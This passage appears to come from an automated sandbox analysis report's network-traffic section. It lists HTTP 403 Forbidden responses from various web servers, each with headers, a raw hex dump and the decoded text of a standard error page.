63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 62 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Wed, 05 Jul 2023 06:07:46 GMTserver: Apachecontent-length: 199content-type: text/html; charset=iso-8859-1x-server: coxkitch-svrData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:46 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:46 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlX-Wix-Request-Id: 1688537266.87688283128118928X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Accept-Ranges: bytesDate: Wed, 05 Jul 2023 06:07:46 GMTX-Served-By: cache-mxp6924-MXPX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,GXNXSWFXisshliUcwO20NYMupe6WQf6MVMrzEUOojIKTPIdeTaQ6JwDV79BjSUA+,qquldgcFrj2n046g4RNSVE8eNr0PeAeqFyO7fo2b794=Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:46 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:46 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Wed, 05 Jul 2023 06:08:02 GMTX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aT4aFncqBmjIPP%2FJPtbfwcwShRyzLNvyO9SPyrIy7Dp%2F62t6ikwBZ9UCXLGm82MRuEzyRAGnEEcxruaDjRJo48QvM13nTzCFzINPfxghe%2Fx%2FAY34fxrgyQhRBO5w"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6dfebfee18c5-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 31 39 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 Data Ascii: 119e<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equi
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Wed, 05 Jul 2023 06:07:47 GMTserver: Apachecontent-length: 199content-type: text/html; charset=iso-8859-1x-server: coxkitch-svrData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Wed, 05 Jul 2023 06:07:47 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceSet-Cookie: crumb=Be/FXoUyvNMWNTM0ZTM1NTI0ZTJkMTU1OTZkMjBjOWQwMDhjZTFh;Path=/X-Contextid: i3J7jeuW/p76wynK8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 